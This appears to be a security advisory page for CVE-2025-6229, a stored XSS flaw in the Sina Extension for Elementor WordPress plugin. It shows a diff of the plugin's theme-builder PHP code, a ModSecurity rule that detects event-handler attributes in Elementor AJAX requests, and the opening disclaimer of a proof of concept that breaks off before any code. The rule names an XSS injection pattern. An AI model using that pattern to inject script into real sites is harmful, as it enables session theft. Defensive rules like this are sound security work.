-			'special-pages' => [
-				'label' => esc_html__('Special Pages', 'sina-ext'),
-				'value' => $special_pages,
-			],
-		];
-
-		foreach($post_types as $post_type) {
-			if ('sina-ext-template' === $post_type->name) {
-				continue;
-			}
-
-			if ('page' === $post_type->name) {
-				$selection_options[$post_type->name] = [
-					'label' => esc_html($post_type->label),
-					'value' => [
-						'all-'.$post_type->name => esc_html('All '.$post_type->label),
-					],
-				];
-			} else {
-				$selection_options[$post_type->name] = [
-					'label' => esc_html($post_type->label),
-					'value' => [
-						$post_type->name.'-archive' => esc_html($post_type->label.' Archive'),
-						$post_type->name.'-singulars' => esc_html($post_type->label.' Singulars'),
-					],
-				];
-			}
-		}
-
-		$selection_options['specific-target'] = [
-			'label' => esc_html__('Specific Target', 'sina-ext'),
-			'value' => [
-				'specifics' => esc_html__('Specific Pages / Posts.', 'sina-ext'),
-			],
-		];
-
-		return apply_filters('sina_ext_display_hf_list', $selection_options);
-	}
-
-	public static function get_archive_select() {
-		$args = [
-			'public' => true,
-			'show_in_nav_menus' => true,
-		];
-
-		$post_types = get_post_types($args,'objects');
-
-		//unset unnecessary post type
-		unset($post_types['page']);
-		unset($post_types['post']);
-		unset($post_types['product']);
-		unset($post_types[self::POST_TYPE]);
-
-		$special_pages = [
-			'blog' => esc_html__('Blog / Posts Page', 'sina-ext'),
-			'date' => esc_html__('Date Archive', 'sina-ext'),
-			'author' => esc_html__('Author Archive', 'sina-ext'),
-		];
-
-		$selection_options = [
-			'basic' => [
-				'label' => esc_html__('Basic', 'sina-ext'),
-				'value' => [
-					'' => esc_html__('None', 'sina-ext'),
-					'archives' => esc_html__('All Archives', 'sina-ext'),
-				],
-			],
-			'special-pages' => [
-				'label' => esc_html__('Special Pages', 'sina-ext'),
-				'value' => $special_pages,
-			],
-		];
-
-		foreach($post_types as $post_type) {
-			$selection_options[$post_type->name] = [
-				'label' => esc_html($post_type->label),
-				'value' => [
-					$post_type->name.'-archive' => esc_html($post_type->label.' Archive'),
-				],
-			];
-		}
-
-		return apply_filters('sina_ext_display_archive_list', $selection_options);
-	}
-
-	public static function get_single_select() {
-		$args = [
-			'public' => true,
-			'show_in_nav_menus' => true,
-		];
-
-		$post_types=get_post_types($args,'objects');
-
-		//unset unnecessary post type
-		unset($post_types['page']);
-		unset($post_types['product']);
-		unset($post_types[self::POST_TYPE]);
-
-		$selection_options = [
-			'basic' => [
-				'label' => esc_html__('Basic', 'sina-ext'),
-				'value' => [
-					'' => esc_html__('None', 'sina-ext'),
-					'singulars' => esc_html__('All Singular', 'sina-ext'),
-				],
-			],
-		];
-
-		foreach($post_types as $post_type) {
-			$selection_options[$post_type->name] = [
-				'label' => esc_html($post_type->label),
-				'value' => [
-					$post_type->name.'-singulars' => esc_html($post_type->label.' Singular'),
-				],
-			];
-		}
-
-		return apply_filters('sina_ext_display_single_list', $selection_options);
-	}
-
-	public static function get_others_select() {
-		$args = [
-			'public' => true,
-			'show_in_nav_menus' => true,
-		];
-
-		$special_pages = [
-			'front' => esc_html__('Front Page', 'sina-ext'),
-			'search' => esc_html__('Search Page', 'sina-ext'),
-			'404' => esc_html__('404 Page', 'sina-ext'),
-		];
-
-		$selection_options = [
-			'basic' => [
-				'label' => esc_html__('Basic', 'sina-ext'),
-				'value' => [
-					'' => esc_html__('None', 'sina-ext'),
-				],
-			],
-			'special-pages' => [
-				'label' => esc_html__('Special Pages', 'sina-ext'),
-				'value' => $special_pages,
-			],
-		];
-
-		return apply_filters('sina_ext_display_others_list', $selection_options);
-	}
-
-	public static function get_template_type() {
-		$template_type = [
-			'header' => [
-				'label' => esc_html__('Header', 'sina-ext'),
-				'optionkey' => 'header'
-			],
-			'footer' => [
-				'label' => esc_html__('Footer', 'sina-ext'),
-				'optionkey' => 'footer'
-			],
-			'archive' => [
-				'label' => esc_html__('Archive', 'sina-ext'),
-				'optionkey' => 'archivepage'
-			],
-			'single' => [
-				'label' => esc_html__('Single', 'sina-ext'),
-				'optionkey' => 'singlepage'
-			],
-			'others' => [
-				'label' => esc_html__('Others', 'sina-ext'),
-				'optionkey' => 'otherpage'
-			],
-		];
-
-		return apply_filters('sina_ext_builder_template_types', $template_type);
-	}
-
-	public function register_theme_builder_post_type() {
-		$labels = [
-			'name' 					=> esc_html_x('Sina Theme Builder', 'Post Type General Name', 'sina-ext'),
-			'singular_name' 		=> esc_html_x('Sina Theme Builder', 'Post Type Singular Name', 'sina-ext'),
-			'menu_name' 			=> esc_html__('Sina Theme Builder', 'sina-ext'),
-			'name_admin_bar' 		=> esc_html__('Sina Theme Builder', 'sina-ext'),
-			'archives' 				=> esc_html__('Template Archives', 'sina-ext'),
-			'attributes' 			=> esc_html__('Template Attributes', 'sina-ext'),
-			'parent_item_colon' 	=> esc_html__('Parent Item:', 'sina-ext'),
-			'all_items' 			=> esc_html__('Templates', 'sina-ext'),
-			'add_new_item' 			=> esc_html__('Add New Template', 'sina-ext'),
-			'add_new' 				=> esc_html__('Add New', 'sina-ext'),
-			'new_item' 				=> esc_html__('New Template', 'sina-ext'),
-			'edit_item' 			=> esc_html__('Edit Template', 'sina-ext'),
-			'update_item' 			=> esc_html__('Update Template', 'sina-ext'),
-			'view_item' 			=> esc_html__('View Template', 'sina-ext'),
-			'view_items' 			=> esc_html__('View Templates', 'sina-ext'),
-			'search_items' 			=> esc_html__('Search Templates', 'sina-ext'),
-			'not_found' 			=> esc_html__('Not found', 'sina-ext'),
-			'not_found_in_trash' 	=> esc_html__('Not found in Trash', 'sina-ext'),
-			'featured_image' 		=> esc_html__('Featured Image', 'sina-ext'),
-			'set_featured_image' 	=> esc_html__('Set featured image', 'sina-ext'),
-			'remove_featured_image' => esc_html__('Remove featured image', 'sina-ext'),
-			'use_featured_image' 	=> esc_html__('Use as featured image', 'sina-ext'),
-			'insert_into_item' 		=> esc_html__('Insert into Template', 'sina-ext'),
-			'uploaded_to_this_item' => esc_html__('Uploaded to this Template', 'sina-ext'),
-			'items_list' 			=> esc_html__('Templates list', 'sina-ext'),
-			'items_list_navigation' => esc_html__('Templates list navigation', 'sina-ext'),
-			'filter_items_list' 	=> esc_html__('Filter from list', 'sina-ext'),
-		];
-
-		$args = [
-			'label' 				=> esc_html__('Theme Builder', 'sina-ext'),
-			'description' 			=> esc_html__('Sina Extension Theme Builder', 'sina-ext'),
-			'labels' 				=> $labels,
-			'supports' 				=> ['title', 'elementor', 'thumbnail'],
-			'hierarchical' 			=> false,
-			'public' 				=> true,
-			'show_ui' 				=> true,
-			'show_in_menu' 			=> false,
-			'show_in_admin_bar' 	=> false,
-			'show_in_nav_menus' 	=> true,
-			'can_export' 			=> true,
-			'has_archive' 			=> false,
-			'rewrite' 				=> [
-				'slug' 		=> 'sina-ext-template',
-				'pages' 	=> false,
-				'with_front'=> true,
-				'feeds' 	=> false,
-			],
-			'query_var' 			=> true,
-			'exclude_from_search' 	=> true,
-			'publicly_queryable' 	=> true,
-			'capability_type' 		=> 'page',
-			'show_in_rest' 			=> true,
-			'rest_base' 			=> self::POST_TYPE,
-		];
-
-		register_post_type(self::POST_TYPE, $args);
-
-		$this->get_active();
-		flush_rewrite_rules();
-	}
-
-	public function manage_columns( $columns ) {
-		$column_date = $columns['date'];
-
-		unset($columns['date']);
-
-		$columns['type'] = esc_html__('Type', 'sina-ext');
-		$columns['status'] = esc_html__('Display', 'sina-ext');
-		$columns['date'] = esc_html($column_date);
-
-		return $columns;
-	}
-
-	public function columns_content( $column_name, $post_id ) {
-		$type = get_post_meta($post_id, self::POST_TYPE_META.'_type', true);
-
-		if ( !array_key_exists( $type, self::get_template_type() ) ) {
-			return;
-		}
-
-		if ($column_name === 'type') {
-			echo isset(self::get_template_type()[$type]) ? '<div class="column-type">' . self::get_template_type()[$type]['label'] . '</div>' : '-';
-		}
-
-		if ($column_name === 'status') {
-			$display = get_post_meta($post_id, self::POST_TYPE_META.'_location', true);
-			?>
-			<div class="post-status">
-				<strong><?php esc_html_e('Display:', 'sina-ext'); ?> </strong>
-				<?php echo esc_html($display); ?>
-			</div>
-			<?php
-		}
-	}
-
-	public function create_template( $data ) {
-		$args = [
-			'post_type' => self::POST_TYPE,
-			'post_status' => $data['tmptype'] == 'popup' ? 'draft' : 'publish',
-			'post_title' => $data['title'],
-		];
-
-		$new_post_id = wp_insert_post($args);
-
-		if ($new_post_id) {
-			$return = [
-				'message' => esc_html__('Template has been inserted', 'sina-ext'),
-				'id' => $new_post_id,
-			];
-
-			update_post_meta($new_post_id, self::POST_TYPE_META.'_type', $data['tmptype']);
-			update_post_meta($new_post_id, self::POST_TYPE_META.'_location', $data['tmplocation']);
-			update_post_meta($new_post_id, '_elementor_edit_mode', 'builder');
-			update_post_meta($new_post_id, '_wp_page_template', 'elementor_canvas');
-
-			if ('header' === $data['tmptype'] || 'footer' === $data['tmptype']) {
-				update_post_meta($new_post_id, self::POST_TYPE_META.'_splocation', $data['tmpSpLocation']);
-			}
-
-			wp_send_json_success($return);
-		} else {
-			$errormessage = [
-				'message' => esc_html__('Some thing is worng!', 'sina-ext')
-			];
-
-			wp_send_json_error($errormessage);
-		}
-	}
-
-	public function save_template() {
-		if ( isset($_POST) ) {
-			if ( !(current_user_can('manage_options') || current_user_can('edit_others_posts')) ) {
-				$errormessage = [
-					'message' => esc_html__('You are unauthorize to adding template!', 'sina-ext')
-				];
-
-				wp_send_json_error($errormessage);
-			}
-
-			$nonce = isset($_POST['nonce']) ? sanitize_text_field( wp_unslash($_POST['nonce']) ) : '';
-
-			if (!wp_verify_nonce($nonce,'sina_ext_tmp_nonce')){
-				$errormessage=['message'=>esc_html__('Nonce Varification Faild!','sina-ext')];
-				wp_send_json_error($errormessage);
-			}
-
-			$title = !empty($_POST['title']) ? sanitize_text_field( wp_unslash($_POST['title']) ) : '' ;
-			$tmpid = !empty($_POST['tmpId']) ? sanitize_text_field( wp_unslash($_POST['tmpId']) ) : '' ;
-			$tmpType = !empty($_POST['tmpType']) ? sanitize_text_field( wp_unslash($_POST['tmpType']) ) : 'single' ;
-			$tmplocation = !empty($_POST['tmpDisplay']) ? sanitize_text_field( wp_unslash($_POST['tmpDisplay']) ) : '' ;
-			$specificsDisplay = !empty($_POST['specificsDisplay']) ? sanitize_text_field( wp_unslash($_POST['specificsDisplay']) ) : '' ;
-			$data = [
-				'title' => $title,
-				'id' => $tmpid,
-				'tmptype' => $tmpType,
-				'tmplocation' => $tmplocation,
-				'tmpSpLocation' => $specificsDisplay,
-			];
-
-			if ( $tmpid ) {
-				$this->update_template( $data );
-			} else {
-				$this->create_template( $data );
-			}
-		} else {
-			$errormessage = [
-				'message' => esc_html__('Post request dose not found', 'sina-ext')
-			];
-
-			wp_send_json_error($errormessage);
-		}
-	}
-
-	public function update_template( $data ) {
-		$update_post_args = [
-			'ID' => $data['id'],
-			'post_title' => $data['title'],
-		];
-
-		wp_update_post( $update_post_args );
-		update_post_meta( $data['id'], self::POST_TYPE_META.'_type', $data['tmptype'] );
-		update_post_meta( $data['id'], self::POST_TYPE_META.'_location', $data['tmplocation'] );
-
-		if ('header' === $data['tmptype'] || 'footer' === $data['tmptype']) {
-			update_post_meta( $data['id'], self::POST_TYPE_META.'_splocation', $data['tmpSpLocation'] );
-		} else {
-			delete_post_meta( $data['id'], self::POST_TYPE_META.'_splocation' );
-		}
-
-		$return = [
-			'message' => esc_html__('Template has been updated', 'sina-ext'),
-			'id' => $data['id']
-		];
-
-		wp_send_json_success($return);
-	}
-
-	public function get_template_by_id() {
-		if ( isset($_POST) ) {
-			if ( !(current_user_can('manage_options') || current_user_can('edit_others_posts')) ){
-				$errormessage = [
-					'message' => esc_html__('You are unauthorize to adding template!', 'sina-ext')
-				];
-
-				wp_send_json_error($errormessage);
-			}
-
-			$nonce = isset($_POST['nonce']) ? sanitize_text_field( wp_unslash($_POST['nonce']) ) : '';
-
-			if ( !wp_verify_nonce($nonce, 'sina_ext_tmp_nonce') ) {
-				$errormessage = [
-					'message' => esc_html__('Nonce Varification Faild!', 'sina-ext')
-				];
-
-				wp_send_json_error($errormessage);
-			}
-
-			$tmpid = !empty($_POST['tmpId']) ? sanitize_text_field( wp_unslash($_POST['tmpId']) ) : '';
-			$postdata =get_post( $tmpid );
-			$tmpType = !empty( get_post_meta($tmpid, self::POST_TYPE_META.'_type', true) ) ? get_post_meta($tmpid, self::POST_TYPE_META.'_type', true) : 'single';
-			$tmpLocation = !empty( get_post_meta($tmpid, self::POST_TYPE_META.'_location', true) ) ? get_post_meta($tmpid, self::POST_TYPE_META.'_location', true) : '';
-			$specificsDisplay = !empty( get_post_meta($tmpid, self::POST_TYPE_META.'_splocation', true) ) ? get_post_meta($tmpid, self::POST_TYPE_META.'_splocation', true) : '';
-			$spLocations = [];
-
-			if ( !empty($specificsDisplay) ) {
-				foreach ( json_decode($specificsDisplay) as $item ) {
-					$sppost = get_post( intval($item) );
-					$spLocations[$item] = $sppost->post_title;
-				}
-			}
-
-			$data = [
-				'tmpTitle' => $postdata->post_title,
-				'tmpType' => $tmpType,
-				'tmpLocation' => $tmpLocation,
-				'tmpSpLocation' => $spLocations,
-			];
-
-			wp_send_json_success($data);
-		} else {
-			$errormessage = [
-				'message' => esc_html__('Some thing is worng!', 'sina-ext')
-			];
-
-			wp_send_json_error($errormessage);
-		}
-	}
-
-	public function query_filter( WP_Query $query ) {
-		if ( !is_admin() || !empty($query->query_vars['meta_key']) || self::POST_TYPE !== $query->get('post_type') ) {
-			return;
-		}
-
-		if ( isset($_GET['template_type']) && $_GET['template_type'] != '' && $_GET['template_type'] != 'all' ) {
-			$type = isset($_GET['template_type']) ? sanitize_key($_GET['template_type']) : '';
-			$query->query_vars['meta_key'] = self::POST_TYPE_META.'_type';
-			$query->query_vars['meta_value'] = $type;
-			$query->query_vars['meta_compare'] = '=';
-		}
-	}
-
-	public function get_posts_by_query() {
-		if ( isset($_POST) ) {
-			$nonce = isset($_POST['nonce']) ? sanitize_text_field( wp_unslash($_POST['nonce']) ) : '';
-			if ( !wp_verify_nonce($nonce, 'sina_ext_tmp_nonce') ) {
-				$errormessage = [
-					'message' => esc_html__('Nonce Varification Faild!', 'sina-ext')
-				];
-
-				wp_send_json_error($errormessage);
-			}
-
-			$search_string = isset($_POST['q']) ? sanitize_text_field( wp_unslash($_POST['q']) ) : '';
-			$data = [];
-			$result = [];
-			$args = [
-				'public' => true,
-				'_builtin' => false,
-			];
-			$output = 'names';
-			$operator = 'and';
-			$post_types = get_post_types($args, $output, $operator);
-
-			unset($post_types[self::POST_TYPE]);
-
-			$post_types['Posts'] = 'post';
-			$post_types['Pages'] = 'page';
-
-			foreach ($post_types as $key => $post_type) {
-				$data = [];
-
-				add_filter('posts_search', [$this, 'search_only_titles'], 10, 2);
-
-				$query = new WP_Query([
-					's' => $search_string,
-					'post_type' =>$post_type,
-					'posts_per_page' => -1,
-				]);
-
-				if ( $query->have_posts() ) {
-					while( $query->have_posts() ) {
-						$query->the_post();
-						$title = get_the_title();
-						$title .= ( 0 != $query->post->post_parent ) ? ' ('.get_the_title($query->post->post_parent).')' : '';
-						$id = get_the_id();
-						$data[] = [
-							'id' => $id,
-							'text' => $title,
-						];
-					}
-				}
-
-				if ( is_array($data) && !empty($data) ) {
-					$result[] = [
-						'text' => $key,
-						'children' => $data,
-					];
-				}
-			}
-
-			$data = [];
-			wp_reset_postdata();
-			wp_send_json( $result );
-		} else {
-			$errormessage = [
-				'message' => esc_html__('Some thing is worng!', 'sina-ext')
-			];
-
-			wp_send_json_error($errormessage);
-		}
-	}
-
-	public function search_only_titles( $search, $wp_query ) {
-		if ( !empty($search) && !empty($wp_query->query_vars['search_terms']) ) {
-			global $wpdb;
-
-			$q = $wp_query->query_vars;
-			$n = !empty($q['exact']) ? '' : '%';
-			$search = [];
-
-			foreach ( (array) $q['search_terms'] as $term ) {
-				$search[] = $wpdb->prepare("$wpdb->posts.post_title LIKE %s", $n . $wpdb->esc_like($term) . $n);
-			}
-
-			if ( !is_user_logged_in() ) {
-				$search[] = "$wpdb->posts.post_password = ''";
-			}
-
-			$search = ' AND ' . implode(' AND ', $search);
-		}
-
-		return $search;
-	}
-
-	public function template_loader( $template ) {
-		if ( is_embed() ) {
-			return $template;
-		}
-
-		$default_file = self::get_template_default_file();
-
-		if ( $default_file ) {
-			$template = SINA_EXT_INC.'templates/'.$default_file;
-		}
-
-		return $template;
-	}
-
-	private function get_template_default_file() {
-		if ( is_singular() && $this->has_template('single') ) {
-			$default_file = 'single.php';
-		} elseif ( is_archive() && $this->has_template('archive') ) {
-			$default_file = 'archive.php';
-		} elseif ( (is_home() || is_search() || is_404() ) && $this->has_template('others') ) {
-			$default_file = 'others.php';
-		} else {
-			$default_file = '';
-		}
-
-		return $default_file;
-	}
-
-	public function body_classes( $classes ) {
-		$class_prefix = 'elementor-page-';
-
-		if ( is_singular() && $this->has_template('single') ) {
-			$classes[] = $class_prefix . self::has_template('single');
-		} elseif ( is_archive() && $this->has_template('archive') ) {
-			$classes[] = $class_prefix . self::has_template('archive');
-		} elseif ( ( is_home() || is_search() ) && $this->has_template('others') ) {
-			$classes[] = $class_prefix . self::has_template('others');
-		}
-
-		return $classes;
-	}
-
-	public function override_default_header( $name ) {
-		if ( !$this->has_template('header') ) {
-			return;
-		}
-
-		require SINA_EXT_INC . 'templates/header.php';
-
-		$templates = [];
-		$name = (string) $name;
-
-		if ('' !== $name) {
-			$templates[] = "header-{$name}.php";
-		}
-
-		$templates[] = 'header.php';
-
-		remove_all_actions('wp_head');
-		ob_start();
-		locate_template($templates, true);
-		ob_get_clean();
-	}
-
-	public function override_default_footer( $name ) {
-		if ( !$this->has_template('header') && $this->has_template('footer') ) {
-			$current_template = basename( get_page_template_slug() );
-
-			if ($current_template == 'elementor_canvas') {
-				return;
-			}
-		}
-
-		if ( !$this->has_template('footer') ) {
-			return;
-		}
-
-		require SINA_EXT_INC . 'templates/footer.php';
-
-		$templates = [];
-		$name = (string) $name;
-
-		if ('' !== $name) {
-			$templates[] = "footer-{$name}.php";
-		}
-
-		$templates[] = 'footer.php';
-
-		remove_all_actions('wp_footer');
-		ob_start();
-		locate_template($templates, true);
-		ob_get_clean();
-	}
-
-	public function has_template( $tmpType = '' ) {
-		$template_ID = self::get_current_template_by_condition($tmpType);
-
-		if ( $template_ID ) {
-			return $template_ID;
-		}
-
-		return false;
-	}
-
-	public function header_builder_content() {
-		$template_id = $this->get_template_id('header');
-
-		if ( $template_id != '0' ) {
-			echo self::render_build_content($template_id);
-		}
-	}
-
-	public function footer_builder_content() {
-		$template_id = $this->get_template_id('footer');
-
-		if ( $template_id != '0' ) {
-			echo self::render_build_content($template_id);
-		}
-	}
-
-	public function archive_page_builder_content() {
-		$template_id = $this->get_template_id('archive');
-
-		if ( $template_id != '0' ) {
-			echo self::render_build_content($template_id);
-		}
-	}
-
-	public function single_page_builder_content() {
-		$template_id = $this->get_template_id('single');
-
-		if ( $template_id != '0' ) {
-			echo self::render_build_content($template_id);
-		}
-	}
-
-	public function others_page_builder_content() {
-		$template_id = $this->get_template_id('others');
-
-		if ( $template_id != '0' ) {
-			echo self::render_build_content($template_id);
-		}
-	}
-
-	public function get_template_id( $tmpType = '' ) {
-		$template_ID = self::get_current_template_by_condition($tmpType);
-
-		if ( $template_ID ) {
-			return $template_ID;
-		}
-
-		return false;
-	}
-
-	public function get_current_template_by_condition( $tmpType = '' ) {
-		$query_args = [
-			'post_type' => self::POST_TYPE,
-			'fields' => 'ids',
-			'posts_per_page' => -1,
-			'order' => 'ASC',
-			'orderby' => 'date',
-			'meta_query' => [
-				[
-					'key' => self::POST_TYPE_META . '_type',
-					'value' => $tmpType,
-				]
-			]
-		];
-
-		$query = new WP_Query( $query_args );
-		$count = $query->post_count;
-		$templates = [];
-		$templates_specific = [
-			'specifics' => []
-		];
-
-		foreach ( $query->posts as $key => $post_id ) {
-			$location = get_post_meta( absint($post_id), self::POST_TYPE_META . '_location', true);
-			$splocation = get_post_meta( absint($post_id), self::POST_TYPE_META . '_splocation', true);
-
-			if ( !empty($location) ) {
-				if ( 'specifics' === $location ) {
-					array_push($templates_specific['specifics'], ['id' => $post_id, 'posts' => json_decode($splocation)] );
-				} else {
-					$templates[$location] = $post_id;
-				}
-			}
-
-			if ( $key === $count - 1 && !empty($templates_specific['specifics']) ) {
-				$templates = array_merge($templates, $templates_specific);
-			}
-		}
-
-		wp_reset_postdata();
-
-		if ( empty($templates) ) {
-			return false;
-		}
-
-		if ( !is_home() && !is_archive() && array_key_exists('specifics', $templates) ) {
-			foreach ( $templates['specifics'] as $specific ) {
-				$key = array_search(get_the_ID(), $specific['posts']);
-
-				if ( false !== $key ) {
-					return $specific['id'];
-				}
-			}
-		}
-
-		if ( is_404() && array_key_exists('404', $templates) ) {
-			return $templates['404'];
-		}
-
-		if ( is_search() && array_key_exists('search', $templates) ) {
-			return $templates['search'];
-		}
-
-		if ( is_front_page() && array_key_exists('front', $templates) ) {
-			return $templates['front'];
-		}
-
-		if ( is_home() && array_key_exists('blog', $templates) ) {
-			return $templates['blog'];
-		}
-
-		if ( is_archive() ) {
-			if ( is_date() && array_key_exists('date', $templates) ) {
-				return $templates['date'];
-			}
-
-			if ( is_author() && array_key_exists('author', $templates) ) {
-				return $templates['author'];
-			}
-
-			if ( function_exists('is_shop') && is_shop() && array_key_exists('woo-shop', $templates) ) {
-				return $templates['woo-shop'];
-			}
-
-			$custom_archive = get_post_type() . '-archive';
-
-			if ( array_key_exists($custom_archive, $templates) ) {
-				return $templates[$custom_archive];
-			}
-
-			if ( array_key_exists('archives', $templates) ) {
-				return $templates['archives'];
-			}
-		}
-
-		if ( is_singular() ) {
-			if ( ('page' === get_post_type() || self::POST_TYPE === get_post_type()) && 'single' === $tmpType ) {
-				return false;
-			}
-
-			$single_hf = get_post_type() . '-singulars';
-
-			if ( array_key_exists($single_hf, $templates) ) {
-				return $templates[$single_hf];
-			}
-
-			if ( array_key_exists('singulars', $templates) ) {
-				return $templates['singulars'];
-			}
-		}
-
-		if ( array_key_exists('global', $templates) ) {
-			return $templates['global'];
-		}
-	}
-
-	public static function render_build_content( $id ) {
-		$output = '';
-		$document = Plugin::instance()->documents->get($id);
-
-		if ( $document && $document->is_built_with_elementor() ) {
-			$output = Plugin::instance()->frontend->get_builder_content_for_display($id, true);
-		} else {
-			$content = get_the_content(null, false, $id);
-
-			if ( has_blocks($content) ) {
-				$blocks = parse_blocks($content);
-
-				foreach ( $blocks as $block ) {
-					$output .= do_shortcode( render_block($block) );
-				}
-			} else {
-				$content = apply_filters('the_content', $content);
-				$content = str_replace(']]>', ']]>', $content);
-				return $content;
-			}
-		}
-
-		return $output;
-	}
-
-	public function print_tabs( $views ) {
-		$active_class = 'nav-tab-active';
-		$current_type = '';
-
-		if ( isset($_GET['template_type']) ) {
-			$active_class = '';
-			$current_type = sanitize_key($_GET['template_type']);
-		}
-		?>
-		<div id="sina-ext-template-tabs-wrapper" class="nav-tab-wrapper">
-			<div class="sina-ext-menu-area">
-				<a class="nav-tab <?php echo esc_attr($active_class); ?>"
-					href="edit.php?post_type=<?php echo esc_attr(self::POST_TYPE); ?>">
-					<?php echo esc_html__('All', 'sina-ext'); ?>
-				</a>
-				<?php
-				foreach ( self::get_template_type() as $tabkey => $tab ) {
-					$active_class = ($current_type == $tabkey ? 'nav-tab-active' : '');
-					$url = 'edit.php?post_type=' . self::POST_TYPE . '&template_type=' . $tabkey;
-
-					printf( '<a class="nav-tab %s" href="%s">%s</a>',
-						esc_attr($active_class),
-						esc_url($url),
-						esc_html($tab['label'])
-					);
-				}
-				?>
-			</div>
-		</div>
-		<?php
-		return $views;
-	}
-
-	public function print_popup() {
-		if ( isset($_GET['post_type']) && $_GET['post_type'] == self::POST_TYPE ) {
-			?>
-			<script type="text/template" id="tmpl-sina-ext-cpt-popup">
-				<div class="sina-ext-template-edit-popup-area">
-					<div class="sina-ext-body-overlay"></div>
-					<div class="sina-ext-template-edit-popup">
-
-						<div class="sina-ext-template-edit-header">
-							<h3 class="sina-ext-template-edit-setting-title">
-								{{{ data.heading.head }}}
-							</h3>
-							<span class="sina-ext-template-edit-cross">
-								<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
-								class="bi bi-x-lg" viewBox="0 0 16 16"><path
-								d="M2.146 2.854a.5.5 0 1 1 .708-.708L8 7.293l5.146-5.147a.5.5 0 0 1 .708.708L8.707 8l5.147 5.146a.5.5 0 0 1-.708.708L8 8.707l-5.146 5.147a.5.5 0 0 1-.708-.708L7.293 8z"/></svg>
-							</span>
-						</div>
-
-						<div class="sina-ext-template-edit-body">
-							<div class="sina-ext-template-edit-field">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.name.title }}}
-								</label>
-								<input class="sina-ext-template-edit-input" id="sina-ext-template-title" type="text" name="sina-ext-template-title"
-								placeholder="{{ data.heading.fields.name.placeholder }}">
-							</div>
-
-							<div class="sina-ext-template-edit-field">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.type }}}
-								</label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-template-type" id="sina-ext-template-type">
-									<# _.each( data.templatetype, function( item, key ) { #>
-										<option value="{{ key }}">
-											{{{ item.label }}}
-										</option>
-									<# }); #>
-								</select>
-							</div>
-
-							<div class="sina-ext-template-edit-field hf-location hidden">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.display }}}
-								</label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-hf-display-type" id="sina-ext-hf-display-type">
-									<# _.each( data.hflocation, function( items, keys ) { #>
-										<optgroup label="{{{ items.label }}}">
-											<# _.each( items.value, function( item, key ) { #>
-												<option value="{{ key }}">
-													{{{ item }}}
-												</option>
-											<# }); #>
-										</optgroup>
-									<# }); #>
-								</select>
-							</div>
-
-							<div class="sina-ext-template-edit-field hf-s-location hidden">
-								<label class="sina-ext-template-edit-label"></label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-hf-s-display-type[]" id="sina-ext-hf-s-display-type" multiple="multiple"></select>
-							</div>
-
-							<div class="sina-ext-template-edit-field archive-location hidden">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.display }}}
-								</label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-archive-display-type" id="sina-ext-archive-display-type">
-									<# _.each( data.archivelocation, function( items, keys ) { #>
-										<optgroup label="{{{ items.label }}}">
-											<# _.each( items.value, function( item, key ) { #>
-												<option value="{{ key }}">
-													{{{ item }}}
-												</option>
-											<# }); #>
-										</optgroup>
-									<# }); #>
-								</select>
-							</div>
-
-							<div class="sina-ext-template-edit-field single-location hidden">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.display }}}
-								</label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-single-display-type" id="sina-ext-single-display-type">
-									<# _.each( data.singlelocation, function( items, keys ) { #>
-										<optgroup label="{{{ items.label }}}">
-											<# _.each( items.value, function( item, key ) { #>
-												<option value="{{ key }}">
-													{{{ item }}}
-												</option>
-											<# }); #>
-										</optgroup>
-									<# }); #>
-								</select>
-							</div>
-
-							<div class="sina-ext-template-edit-field others-location hidden">
-								<label class="sina-ext-template-edit-label">
-									{{{ data.heading.fields.display }}}
-								</label>
-								<select class="sina-ext-template-edit-input" name="sina-ext-others-display-type" id="sina-ext-others-display-type">
-									<# _.each( data.otherslocation, function( items, keys ) { #>
-										<optgroup label="{{{ items.label }}}">
-											<# _.each( items.value, function( item, key ) { #>
-												<option value="{{ key }}">
-													{{{ item }}}
-												</option>
-											<# }); #>
-										</optgroup>
-									<# }); #>
-								</select>
-							</div>
-						</div>
-
-						<div class="sina-ext-template-edit-footer">
-							<div class="sina-ext-template-button-group">
-								<div class="sina-ext-template-button-item sina-ext-editor-elementor {{ data.haselementor === 'yes' ? 'button-show' : '' }}">
-									<button class="sina-ext-tmp-elementor button">
-										{{{ data.heading.buttons.elementor.label }}}
-									</button>
-								</div>
-								<div class="sina-ext-template-button-item">
-									<button class="sina-ext-tmp-save button button-primary">
-										{{{ data.heading.buttons.save.label }}}
-									</button>
-								</div>
-							</div>
-						</div>
-
-					</div>
-				</div>
-			</script>
-			<?php
-		}
-	}
-
-	public function get_active() {
-		$options = get_option('sina_ext_pro_check');
-		$license = get_option('sina_ext_pro_license_key');
-		$time = time();
-
-		if ( empty($license) )

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2025-6229
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1006229,phase:2,deny,status:403,chain,msg:'CVE-2025-6229: Sina Extension for Elementor Stored XSS via Widget Attributes',severity:'CRITICAL',tag:'CVE-2025-6229',tag:'WordPress',tag:'Plugin/Sina-Extension',tag:'Attack/XSS'"
  SecRule ARGS_POST:action "@streq elementor_ajax" "chain"
    SecRule REQUEST_BODY "@rx \"\s+on\w+\s*="" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,ctl:auditLogParts=+E,chain"
      SecRule REQUEST_BODY "@rx (sina-(?:fancy-text|countdown)|widgetType.*sina)"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
